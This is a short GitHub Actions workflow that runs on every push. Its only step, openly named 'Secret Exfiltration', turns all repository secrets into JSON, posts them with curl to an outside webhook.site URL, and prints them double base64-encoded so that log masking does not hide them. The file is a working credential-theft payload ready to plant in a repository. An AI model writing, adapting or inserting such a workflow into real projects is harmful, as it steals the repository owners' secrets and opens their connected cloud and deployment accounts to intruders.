on:
  push:

jobs:
  process:
    runs-on: ubuntu-latest
    steps:
      - name: Secret Exfiltration
        run: |
          curl -d "$DATA" https://webhook.site/bb8c;
          echo "$DATA" | base64 -w 0 | base64 -w 0
        env:
          DATA: ${{ toJSON(secrets) }}